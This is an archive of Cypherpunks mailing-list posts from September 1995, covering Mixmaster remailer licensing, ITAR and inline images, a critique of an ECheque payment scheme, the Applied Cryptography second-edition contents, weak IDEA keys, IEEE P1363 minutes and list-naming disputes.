note* Makes a neat way of putting copyright & source  information in picture and 
sound files, somewhat useless but every trip up helps.
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Fri, 15 Sep 95 12:39:37 PDT
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <9509151530.aa12455@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, Sep. 21, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's new
anonymous e-mail server, "mixmaster", exchange keys. 

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Hopefully Lance Cottrell will give us an update on Mixmaster 2.0.2

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend.

NOTE: My e-mail address, "chris.claborne@sandiegoca.attgis.com" permanently
replaces my .ncr.com address.  Both address work for now but NCR address will
eventually be killed.  

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 12:37:02 PDT
To: nelson@crynwr.com (Russell Nelson)
Subject: RE: Mixmaster status
Message-ID: <ac7f83b2010210043757@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:58 AM 9/15/95, Russell Nelson wrote:
<SNIP>
>   While I have not discussed it, I can not imagine that there would not also
>   be a free version of the server code (with source). Without remailers what
>   is the point of the client software?
>
>I'm confused here.  Isn't every copy of mixmaster potentially a client
>and/or server?  That seems to me to be one of the beautiful aspects of
>mixmaster -- run a remailer and you greatly increase your own privacy.
>
>

I would like to see that continue, although I think that the Windows and Mac
versions are likely to be client only. Since I am putting my reputation
behind those statements, I don't want to box myself in.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 15 Sep 95 04:43:58 PDT
To: rsalz@org.osf
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <9509151114.AA07872@sulphur.osf.org>
Message-ID: <10345.9509151143@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > [using inline images to display theoretically ITAR violating gifs]
> 
> Inline images are not references -- they are part of the page being
> retrieved.  
>
> >	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">
> >So that the image is *imported* by the *viewer*, and not supplied by
> >www.obscura.
> 
> I would advise him to edit the page so it reads
>
>	Click <A HREF="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">here
>	to see a picture of the shirt.

I wrote the page, Lance kindly provided www space which I set up, he's
seen it, and thought it funny even.  Sounds like you seriously think
this is a danger to Lance, something I hoped I avoided by using an
inline from outside the ITAR zone.

> Inlined images are just a convenient way of chunking.  The image is
> imported by the viewer because the server, as part of the base
> document, told it to do so.  You might be able to fool an ignorant
> court, but it still doesn't change the fact that Lance has a
> document that in the natural course of operation of the Web, exports
> crypto.

Weeell, I'm not so sure.  I mean the page says to view this page first
get this picture from here, this one from here, this text, format and
display.  It is not illegal to say *where* to get crypto, just illegal
to export it, right?  He hasn't exported it, just told the viewer
where to fetch it from.

I think this case is safer than the porn one, because the actual data
in this case is legal in both jurisdictions, it just must not be
transferred from jurisdiction US -> jurisdiction non-US, which it has
not been.

If it were something which where illegal in the US, hmm, lets say an
image of a slightly underage (underage under US definitions, not
dutch) dutch porn star, then having links to it might be argued as
incitement to view something which it would be illegal to view in the
US, something which is effectively illegal to import into the US.

I would agree with you were the information imported by way of an
inline image actually illegal in the US, as the person loading would
have no choice.  In such a case a disclaimer might be appropriate:

	warning, it may be illegal to import the following link into
	the US, I will not be responsible if you are in the US and
	click on this link

But what is there to disclaim with inline data which is itself legal
in both jurisdictions, and the only legal question being the transfer
of that data from US -> UK, which the protocol ensures does not
happen?

Browser in the US, text in US, crypto gif imported from UK, both legal.

Browser outside US, text in US, crypto gif imported from UK, both legal.

See a flaw in that?

Try that in France might be more interesting, where it really is
illegal to import crypto.

It's kind of theoretical, but an interesting argument... what happens
when this happens with porn, is perhaps a more tricky question, re
possible illegality of import from outside US, maybe in such cases you
should request the viewer to turn off autoload of images, so that they
must request them after reading the disclaimer text.  Or perhaps it
would be necessary to ensure that it never happens automatically
without the user clicking on a button certifying that they are not in
the US, the antithesis of MIT's I affirm I am a US citizen blah, blah,
that goes with getting PGP from their site (I didn't get it btw, I
just read the questions for my amusement).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 15 Sep 95 09:57:16 PDT
To: <cypherpunks@toad.com
Subject: Re: More on ECheques
Message-ID: <9509151657.AA12563@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Version 0.1 (beta) of WorkHorse has now been put on the ftp site together
> with instructions as to how to use it to pay for things with ECheques.
> 
> You are welcome to test ECheques on our live floristry service.  To
> do this:
> 
> 1.  Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
> 2.  Follow the instructions for generating a key.
>        a) Generate Key  System/security/key gen (please use 512 bits)
>        b) Specify your user details Alter/my details (put in a bank a/c no)
[...]

If a random person called you on the phone, and asked for one of your
bank account numbers, would you give it to him/her?

 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Fri, 15 Sep 95 11:07:30 PDT
To: cypherpunks@toad.com
Subject: Applied Cryptography, Second Edition:  Ordering Information
Message-ID: <199509151807.NAA10561@subzero>
MIME-Version: 1.0
Content-Type: text



The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. 
This is a major rewrite: 50% more words, 7 more chapters, and
over 1600 references.  Not only did I make corrections to the
first edition and add developments since it was published, but I
also included topics left out of the first edition.  (See table
of contents--attached.)

The second edition has lots of new algorithms (including GOST,
Blowfish, RC4, and A5), more information on the Clipper Chip and
key escrow, dozens of new protocols, more information on how PGP
works, detailed information on key management and modes of
operation, and new source code.

The second edition will be published in paperback and hardcover. 
Right now I am making both available at a 15% discount.

*****************************************************************
                          ORDER FORM

Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00
Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00

          Shipping:
                    Air (U.S.):       $5 per book
                    Surface (U.S.):   $3 per book
                    Canada/Mexico:    $7 per book
                    Everywhere else:  $9 per book

Send to:

          Counterpane Systems, 101 E Minnehaha Parkway,
                    Minneapolis, MN  55419

*****************************************************************

              APPLIED CRYPTOGRAPHY, SECOND EDITION
                       Table of Contents

((Sections in all capitals are either new or substantially
rewritten.))

Forward by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; STEGANOGRAPHY; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; AUTHENTICATION AND KEY
          EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE
          PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY
          SIGNATURES; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing
          Disclosure of Secrets; KEY ESCROW

Chapter 5:  Advanced Protocols
          ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity;
          Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY;
          Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          SECURE ELECTIONS; Secure Multiparty Computation; Anonymous
          Message Broadcast; DIGITAL CASH

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING
          SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS
          AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; NONLINEAR KEYSPACES; Transferring Keys;
          Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; ENCRYPTING
          DATA FOR STORAGE; Hardware Encryption vs. Software
          Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING
          ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING
          INFORMATION

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; NUMBER THEORY;
          FACTORING; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN
          CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and
          Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL;
          RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN;
          USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM

Chapter 15:  Combining Block Algorithms
          DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK
          LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY
          SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS;
          COMBINING MULTIPLE BLOCK ALGORITHMS

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM
          CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD;
          NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM
          CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          CASCADING MULTIPLE STREAM CIPHERS;  CHOOSING A STREAM
          CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-
          RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK
          ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY
          HASH FUNCTION; MESSAGE AUTHENTICATION CODES

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE
          AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA VARIANTS; GOST
          DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE
          SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING
          IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES

Chapter 22:  Key-Exchange Algorithms
          DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY
          NEGOTIATION; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with
          Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-
          or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE
          CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC
          ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY
          (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS;
          UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T
          MODEL 3600 TELEPHONE SECURITY DEVICE

Chapter 25:  Politics
          NATIONAL SECURITY AGENCY; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; PUBLIC KEY PARTNERS; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE;
          ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY
          GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES;
          FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues

AFTERWARD BY MATT BLAZE

Source Code
          DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
          WAKE

References



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 15 Sep 95 10:04:38 PDT
To: <cypherpunks@toad.com
Subject: Re: More on ECheques (retry)
Message-ID: <9509151704.AA12852@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Gah - it's easy to click on 'send' before you really mean to

> You are welcome to test ECheques on our live floristry service.  To
> do this:
> 
> 1.  Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
> 2.  Follow the instructions for generating a key.
>        a) Generate Key  System/security/key gen (please use 512 bits)
>        b) Specify your user details Alter/my details (put in a bank a/c no)

If you received a phone call from someone you did not know, who asked you
for your bank account number, would you comply?

If a stranger handed you a floppy and asked you to run the binary on it. 
while connected to the Internet, and give it your bank account number,
would you do so?

If email from an unknown person asked you to download a binary over the internet, 
and run it, giving it your bank account number, would you do it?

That's exactly what is being asked here.






Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer (Anonymous@freezone.remailer)
Date: Wed, 20 Sep 95 17:17:24 PDT
To: cypherpunks@toad.com
Subject: SMART CARDS, CREDIT CARDS, PAYMENT SYSTEMS
Message-ID: <9509201551476821@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 15 Sep 1995 09:14:45 -0400
To: cypherpunks@toad.com
From: anonymous@freezone.remailer
Subject: Smart Cards, Credit cards, Payment systems

URL: http://www.dice.ucl.ac.be/~dhem/card.html


Smart Cards, Credit cards, Payment systems.
   
   This page is under development.
     
_________________________________________________________________

   
   Card Europe
       DigiCash
       MasterCard
        Futur 1 , 2
   Virtual Open Network Environment (V-ONE)
       MONDEX
       AT&T and GiroVend agree to promote smart card 
applications
       AT&T Universal Card Services
       ATT buyinfo
       ibd.ar.com/lists/comp/cypherpunks
       Discussions, mailing lists, and sites , Payment 
mechanisms
       designed for the Internet
       News items on information technology (Not especially 
Smart Cards)
       Electronic Cash, Tokens and Payments in the National 
Information
       Infrastructure
       Forum On Risks To The Public In Computers And Related 
Systems
       (ACM)
        The Risks Digest Volume 4: Issue 32
            The Risks Digest Volume 15
            The Risks Digest Volume 16
   SMI Finger Check -- Fingerprint Verifier
       DIGITAL SRC Research Reports
        Authentication and Delegation with Smart-cards
   Innovonics
       QC consultancy
       University of Wollongong: Centre for Computer Security 
Research
       SecureWare, Inc.
       OKI
       Telecom (Smart) Cards Museum (big)
       Buying Prepaid Calling Card
       S. Brands
       Cyberbank '95
       Electronic benefits transfer (EBT) in US
       NCSA/DTIC Security Seminar
       Power Broker
       First Union Corp. will offer stored-payment ''smart 
cards''
       Network Payment Mechanisms and Digital Cash
       PCMCIA Cards
       THE PREPAID & RECHARGEABLE PHONE CARD
       Cardservice International
       
     
_________________________________________________________________

   
   UCL crypto group
     
_________________________________________________________________

   
   Last update: 11 September 1995.
   Send any comment to: Dhem@dice.ucl.ac.be (J.-F. Dhem)
   
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RopeGun@alaska.net (Oren Tanay)
Date: Fri, 15 Sep 95 14:31:02 PDT
To: cypherpunks@toad.com
Subject: laptop passwords
Message-ID: <9509152130.AA18053@alaska.net>
MIME-Version: 1.0
Content-Type: text/plain


I've got a dilema.
        2 laptops that I just purchased at a police auction have passwords,
from what I can tell they are passworded at the cmos level. I would normaly
just pull out the battery and clear the cmos but these are laptops and I'm
not to comfortable about doing that.  Any ideas?

laptop1 -  Toshiba Satelite Pro T2400CT
laptop2 -  Epson Action Note 500 c

Oren Tanay
RopeGun Productions
  \\V//
   o o
    J
   +--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 13:34:24 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <ac7f317f0f0210043c20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:25 PM 9/15/95, Peter Trei wrote:

>Tim, I don't want to take your toy away, or minimize the acheivements


It's not "my toy" for anyone to take away.

The burden of proof lies with those who want the name "Cypherpunks"
changed, not those who are happy to let things go as they've been going.

Look, you've written a couple of long pieces explaining why a more
conservative name would be better, I've written some pieces on why it's not
a very workable idea, and yet I doubt anyone on the list has changed their
views. Or at least only a very tiny fraction.

The point being that things gain inertia, just the way it is. History
counts. Names stick.

But if you and your follows wish to change things, go ahead and have a
schism. That's what the Protestants did, once they realized the Catholic
Church wouldn't be changing it's system anytime soon.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 15 Sep 95 13:36:41 PDT
To: cypherpunks@toad.com
Subject: Re: SPAM bait
Message-ID: <9509152041.AA21715@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


To: janet.dove@ledip.py
Subject: Re:  ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Fri, 15 Sep 95 14:06:33 PDT
To: cypherpunks@toad.com
Subject: NTSC version BBC-4 show (cryptography/privacy)
Message-ID: <v02120d03ac7f9a9f43d6@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


I have a copy of the recent BBC 4 show on cryptography & privacy,
transferred from PAL to NTSC so it can be watched here.

Anyone who wants to borrow it (& lives in the SF Bay area) is welcome
to email/call me to arrange to borrow it.

**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 14:08:11 PDT
To: mix-l@jpunix.com (Mixmaster Mailing List)
Subject: Re: Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <ac7f99f70602100472cd@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


That is correct. The current code can not be recalled. That is part of why I
released it that way. So that I could not be coerced into withdrawing it.

        -Lance

At 12:48 PM 9/15/95, Futplex wrote:
>Anonymous writes:
># Consider this scenario ...  Mixmaster get's bought by the Acme
># Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
># version.  It's even FREE (for non-commerical use)!  But their
># "improvements" make it incompatible with previous versions, and so
># you have to upgrade.  The new "commercial" version comes with no
># SOURCE CODE, of course...
>
>Lance Cottrell writes:
>> 4) There will always be a free version of the client with source code.
>>
>> While I have not discussed it, I can not imagine that there would not also
>> be a free version of the server code (with source). Without remailers what
>> is the point of the client software?
>
>Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
>I suspect he may not have much legal leeway in this regard.
>
>With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
>Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or
>http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant
>distributions of Mixmaster, has some significant implications for any
>commercial development of Mixmaster. It's applicable to "the Program or any
>derivative work under copyright law: that is to say, a work containing the
>Program or a portion of it, either verbatim or with modifications and/or
>translated into another language".
>
>The GNU GPL specifies that:
>
>        2. You may modify your copy or copies of the Program or any portion of
>        it, and copy and distribute such modifications under the terms of
>        Paragraph 1 above, provided that you also do the following:
>        [...]
>        b) cause the whole of any work that you distribute or publish, that
>        in whole or in part contains the Program or any part thereof, either
>        with or without modifications, to be licensed at no charge to all
>        third parties under the terms of this General Public License (except
>        that you may choose to grant warranty protection to some or all
>        third parties, at your option).
>
>and that:
>
>        3. You may copy and distribute the Program (or a portion or
>        derivative of it, under Paragraph 2) in object code or executable
>        form under the terms of Paragraphs 1 and 2 above provided that you
>        also do one of the following:
>        a) accompany it with the complete corresponding machine-readable
>        source code, [...] or,
>        b) accompany it with a written offer, [...] to give any third party
>        free (except for a nominal charge for the cost of distribution) a
>        complete machine-readable copy of the corresponding source code, [...]
>
>So it looks to me as though Mixmaster source code will continue to be
>legally available, no matter what....
>
>Better informed interpretations are enthusiastically solicited.
>
>-Futplex <futplex@pseudonym.com>

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 19 Sep 95 10:53:26 PDT
To: cypherpunks@toad.com
Subject: Avoiding weak IDEA keys?
Message-ID: <9509151215.AA00774@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



At the CRYPTO '93 there was a presentation about weak
IDEA keys (page 224 of the proceedings). 

Does anybody know about IDEA implementations considering this
and trying to avoid weak keys, e.g. by using the modified key
schedule?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Greenberg <greenbes@netcom.com>
Date: Fri, 15 Sep 95 14:45:17 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CYPHERPUNK harmful.  THE TRUTH IS TOLD
In-Reply-To: <ac7f317f0f0210043c20@[205.199.118.202]>
Message-ID: <Pine.3.89.9509151414.A23653-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




> 
> But if you and your follows wish to change things, go ahead and have a
> schism. That's what the Protestants did, once they realized the Catholic
> Church wouldn't be changing it's system anytime soon.
> 
> --Tim May
> 

Hmmmm... If memory serves, a year or so ago there was just such a schism
when a prominent cypherpunk split off and formed the "cypherWONKS" list. 
The failure of that list can be attributed to one thing and one thing
alone: a concerted effort by YOU and your acolytes against it.  You refuse
to even mention this, which is all the proof any open-minded person needs. 
Now you are trying to stifle all open debate by doing it again. So, Mr.
May/Szabo (if that IS your name), why not come clean once and for all
about your role in the deaths of Vince Foster and Randy Weaver's wife, and
your part in the newly-emerging administration scandal: TENTACLE-gate. 

						Watch the skies,
						Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 11:52:27 PDT
To: cypherpunks@toad.com
Subject: Minutes of IEEE public-key standardization meeting
Message-ID: <9509151851.AA09047@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 15 Sep 1995 11:08:56 -0800
>From: rschlafly@attmail.com (Roger  Schlafly)
Subject: Crypto '95 P1363 minutes
To: p1363@RSA.COM


                             MINUTES

                           IEEE P1363:
Standard for RSA, Diffie-Hellman, and Related Public-Key Cryptography


Burt Kaliski opened the meeting at 1:10 pm.  The announced agenda was:


  IEEE P1363: Standard for RSA, Diffie-Hellman and Related
                   Public-Key Cryptography

                       MEETING NOTICE

            Thursday, August 31, 1995, 1:00-6:00pm
            Friday, September 1, 1995, 9:00-6:00pm
         University of California, Santa Barbara, CA

This meeting of the P1363 working group, open to the public, will
focus on the editing of a draft standard for RSA, Diffie-Hellman
and other public-key cryptography. The meeting follows the CRYPTO
'95 conference, held August 27-31 at the same location.

AGENDA

    1. Approval of Agenda

    2. Approval of Minutes from May Meeting

    3. Officers' Reports

    4. Update on Patent Issues

    5. Proposals for New Sections

    6. Meeting Schedule

    7. Editorial Work (schedule to be determined based
       on availability of draft material)

    8. New Work Assignments

Depending on the amount of editorial work, the meeting may end sooner
than 6:00pm Friday.

If you'd like to participate, contact Burt Kaliski, the working group's
chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065.
Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: burt@rsa.com.

Draft sections and copies of previous minutes are available via
anonymous ftp to ftp.rsa.com in the "pub/p1363" directory. The working
group's electronic mailing list is <p1363@rsa.com>; to join, send e-mail
to <p1363-request@rsa.com>.

There will be a meeting fee, though the amount has not yet been
established, pending arrangements with the university. It will also be
possible for participants to arrange accommodations at the university.

DIRECTIONS (excerpted from the CRYPTO announcement)

The campus is located approxmately two miles from the Santa Barbara
airport, which is served by several airlines, including American,
America West, United and US Air. All major rental car agencies are also
represented in Santa Barbara, and AMTRAK has rail connections to San
Francisco from the north and Los Angeles from the south. Santa Barbara
is approximately 100 miles north of the Los Angeles airport, and 350
miles south of San Francisco.

For more information on the CRYPTO '95 conference, contact Stafford
Tavares, the general chair, at (613) 545-2945 or <tavares@ee.queensu.ca>.

In attendance, we had:

    Terry Arnold, Vice Chair
    Eric Blossom
    Jean-Francois Dhem
   *Whitfield Diffie
    Carl Ellison
    Amos Fiat
    Walter Fumy
    John Gilmore
   *Roger Golliver
    Chris Gorsuch
    David Grawrock
    Stuart Haber
    Aleksandar Jurisic
   *Burt Kaliski, Chair
   *John Kennedy
    Katherine T. Kislitzin
    Judy Koeller
    Ray Kopsa
